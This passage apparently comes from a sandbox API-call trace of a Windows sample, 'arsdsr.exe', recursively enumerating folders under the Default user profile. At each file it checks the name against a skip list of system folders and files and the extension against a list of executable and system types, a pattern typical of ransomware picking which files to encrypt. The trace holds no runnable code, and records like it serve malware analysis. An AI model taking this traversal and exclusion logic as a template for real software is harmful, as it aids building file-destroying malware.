ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Links", cAlternateFileName="")) returned 1 [0151.829] lstrcmpiW (lpString1="Links", lpString2=".") returned 1 [0151.829] lstrcmpiW (lpString1="Links", lpString2="..") returned 1 [0151.829] lstrcmpiW (lpString1="Links", lpString2="...") returned 1 [0151.829] lstrcmpiW (lpString1="Links", lpString2="windows") returned -1 [0151.829] lstrcmpiW (lpString1="Links", lpString2="$recycle.bin") returned 1 [0151.829] lstrcmpiW (lpString1="Links", lpString2="rsa") returned -1 [0151.829] lstrcmpiW (lpString1="Links", lpString2="ntuser.dat") returned -1 [0151.829] lstrcmpiW (lpString1="Links", lpString2="programdata") returned -1 [0151.829] lstrcmpiW (lpString1="Links", lpString2="appdata") returned 1 [0151.829] lstrcmpiW (lpString1="Links", lpString2="program files") returned -1 [0151.829] lstrcmpiW (lpString1="Links", lpString2="program files (x86)") returned -1 [0151.829] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Favorites\\" | out: lpString1="C:/Users\\Default\\Favorites\\") returned="C:/Users\\Default\\Favorites\\" [0151.829] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\", lpString2="Links" | out: lpString1="C:/Users\\Default\\Favorites\\Links") returned="C:/Users\\Default\\Favorites\\Links" [0151.829] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\Links", lpString2="\\" | out: lpString1="C:/Users\\Default\\Favorites\\Links\\") returned="C:/Users\\Default\\Favorites\\Links\\" [0151.829] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\Default\\Favorites\\Links\\" | out: lpString1="C:/Users\\Default\\Favorites\\Links\\") returned="C:/Users\\Default\\Favorites\\Links\\" [0151.829] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\Links\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Favorites\\Links\\*.*") returned="C:/Users\\Default\\Favorites\\Links\\*.*" [0151.829] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Favorites\\Links\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0151.829] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.830] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0151.830] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.830] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.830] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfefb1330, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0151.830] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0151.830] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0151.830] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0151.830] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0151.830] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0151.830] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0151.830] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0151.830] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0151.830] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0151.830] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0151.830] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0151.830] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Default\\Favorites\\Links\\" | out: lpString1="C:/Users\\Default\\Favorites\\Links\\") returned="C:/Users\\Default\\Favorites\\Links\\" [0151.830] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\Links\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Default\\Favorites\\Links\\desktop.ini") returned="C:/Users\\Default\\Favorites\\Links\\desktop.ini" [0151.830] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.830] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.830] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0151.830] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0151.830] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0151.830] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0151.830] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0151.830] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0151.830] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0151.830] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0151.830] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb11062, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0151.830] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2=".") returned 1 [0151.830] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="..") returned 1 [0151.830] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="...") returned 1 [0151.830] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="windows") returned -1 [0151.830] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="$recycle.bin") returned 1 [0151.830] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="rsa") returned 1 [0151.831] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="ntuser.dat") returned 1 [0151.831] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="programdata") returned 1 [0151.831] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="appdata") returned 1 [0151.831] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="program files") returned 1 [0151.831] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="program files (x86)") returned 1 [0151.831] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Default\\Favorites\\Links\\" | out: lpString1="C:/Users\\Default\\Favorites\\Links\\") returned="C:/Users\\Default\\Favorites\\Links\\" [0151.831] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\Links\\", lpString2="Web Slice Gallery.url" | out: lpString1="C:/Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned="C:/Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" [0151.831] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.831] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.831] PathFindExtensionW (pszPath="Web Slice Gallery.url") returned=".url" [0151.831] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0151.831] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0151.831] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0151.831] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0151.831] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0151.831] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0151.831] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0151.831] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0151.831] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0151.831] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb11062, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0151.831] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0151.831] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0151.831] lstrcmpiW (lpString1="Microsoft Websites", lpString2=".") returned 1 [0151.831] lstrcmpiW (lpString1="Microsoft Websites", lpString2="..") returned 1 [0151.831] lstrcmpiW (lpString1="Microsoft Websites", lpString2="...") returned 1 [0151.831] lstrcmpiW (lpString1="Microsoft Websites", lpString2="windows") returned -1 [0151.831] lstrcmpiW (lpString1="Microsoft Websites", lpString2="$recycle.bin") returned 1 [0151.831] lstrcmpiW (lpString1="Microsoft Websites", lpString2="rsa") returned -1 [0151.831] lstrcmpiW (lpString1="Microsoft Websites", lpString2="ntuser.dat") returned -1 [0151.831] lstrcmpiW (lpString1="Microsoft Websites", lpString2="programdata") returned -1 [0151.831] lstrcmpiW (lpString1="Microsoft Websites", lpString2="appdata") returned 1 [0151.831] lstrcmpiW (lpString1="Microsoft Websites", lpString2="program files") returned -1 [0151.831] lstrcmpiW (lpString1="Microsoft Websites", lpString2="program files (x86)") returned -1 [0151.831] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Favorites\\" | out: lpString1="C:/Users\\Default\\Favorites\\") returned="C:/Users\\Default\\Favorites\\" [0151.832] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\", lpString2="Microsoft Websites" | out: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites") returned="C:/Users\\Default\\Favorites\\Microsoft Websites" [0151.832] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites", lpString2="\\" | out: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:/Users\\Default\\Favorites\\Microsoft Websites\\" [0151.832] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:/Users\\Default\\Favorites\\Microsoft Websites\\" [0151.832] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites\\*.*") returned="C:/Users\\Default\\Favorites\\Microsoft Websites\\*.*" [0151.832] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Favorites\\Microsoft Websites\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0151.840] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.840] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0151.840] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.841] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.841] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa066c0, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0151.841] lstrcmpiW (lpString1="IE Add-on site.url", lpString2=".") returned 1 [0151.841] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="..") returned 1 [0151.841] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="...") returned 1 [0151.841] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="windows") returned -1 [0151.841] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="$recycle.bin") returned 1 [0151.841] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="rsa") returned -1 [0151.841] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="ntuser.dat") returned -1 [0151.841] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="programdata") returned -1 [0151.841] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="appdata") returned 1 [0151.841] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="program files") returned -1 [0151.841] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="program files (x86)") returned -1 [0151.841] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:/Users\\Default\\Favorites\\Microsoft Websites\\" [0151.841] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="IE Add-on site.url" | out: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned="C:/Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" [0151.841] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.841] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.841] PathFindExtensionW (pszPath="IE Add-on site.url") returned=".url" [0151.841] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0151.841] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0151.841] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0151.841] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0151.841] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0151.841] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0151.841] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0151.841] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0151.841] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0151.841] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa066c0, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0151.841] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2=".") returned 1 [0151.841] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="..") returned 1 [0151.841] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="...") returned 1 [0151.841] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="windows") returned -1 [0151.841] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="$recycle.bin") returned 1 [0151.841] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="rsa") returned -1 [0151.841] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="ntuser.dat") returned -1 [0151.842] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="programdata") returned -1 [0151.842] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="appdata") returned 1 [0151.842] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="program files") returned -1 [0151.842] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="program files (x86)") returned -1 [0151.842] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:/Users\\Default\\Favorites\\Microsoft Websites\\" [0151.842] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="IE site on Microsoft.com.url" | out: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned="C:/Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" [0151.842] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.842] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.842] PathFindExtensionW (pszPath="IE site on Microsoft.com.url") returned=".url" [0151.842] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0151.842] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0151.842] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0151.842] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0151.842] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0151.842] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0151.842] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0151.842] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0151.842] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0151.842] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0151.842] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2=".") returned 1 [0151.842] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="..") returned 1 [0151.842] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="...") returned 1 [0151.842] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="windows") returned -1 [0151.842] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="$recycle.bin") returned 1 [0151.842] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="rsa") returned -1 [0151.842] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="ntuser.dat") returned -1 [0151.842] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="programdata") returned -1 [0151.843] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="appdata") returned 1 [0151.843] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="program files") returned -1 [0151.843] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="program files (x86)") returned -1 [0151.843] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:/Users\\Default\\Favorites\\Microsoft Websites\\" [0151.843] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="Microsoft At Home.url" | out: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned="C:/Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" [0151.843] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.843] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.843] PathFindExtensionW (pszPath="Microsoft At Home.url") returned=".url" [0151.843] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0151.843] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0151.843] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0151.843] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0151.843] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0151.843] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0151.843] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0151.843] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0151.843] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0151.843] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0151.843] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2=".") returned 1 [0151.843] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="..") returned 1 [0151.843] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="...") returned 1 [0151.843] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="windows") returned -1 [0151.843] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="$recycle.bin") returned 1 [0151.843] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="rsa") returned -1 [0151.843] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="ntuser.dat") returned -1 [0151.843] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="programdata") returned -1 [0151.843] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="appdata") returned 1 [0151.843] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="program files") returned -1 [0151.843] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="program files (x86)") returned -1 [0151.843] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:/Users\\Default\\Favorites\\Microsoft Websites\\" [0151.843] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="Microsoft At Work.url" | out: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned="C:/Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" [0151.843] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.843] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.843] PathFindExtensionW (pszPath="Microsoft At Work.url") returned=".url" [0151.843] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0151.844] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0151.844] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0151.844] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0151.844] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0151.844] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0151.844] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0151.844] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0151.844] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0151.844] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0151.844] lstrcmpiW (lpString1="Microsoft Store.url", lpString2=".") returned 1 [0151.844] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="..") returned 1 [0151.844] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="...") returned 1 [0151.844] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="windows") returned -1 [0151.844] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="$recycle.bin") returned 1 [0151.844] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="rsa") returned -1 [0151.844] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="ntuser.dat") returned -1 [0151.844] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="programdata") returned -1 [0151.844] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="appdata") returned 1 [0151.844] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="program files") returned -1 [0151.844] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="program files (x86)") returned -1 [0151.844] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:/Users\\Default\\Favorites\\Microsoft Websites\\" [0151.844] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="Microsoft Store.url" | out: lpString1="C:/Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned="C:/Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" [0151.844] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.844] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.844] PathFindExtensionW (pszPath="Microsoft Store.url") returned=".url" [0151.844] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0151.844] lstrcmpiW (lpString1=".url", 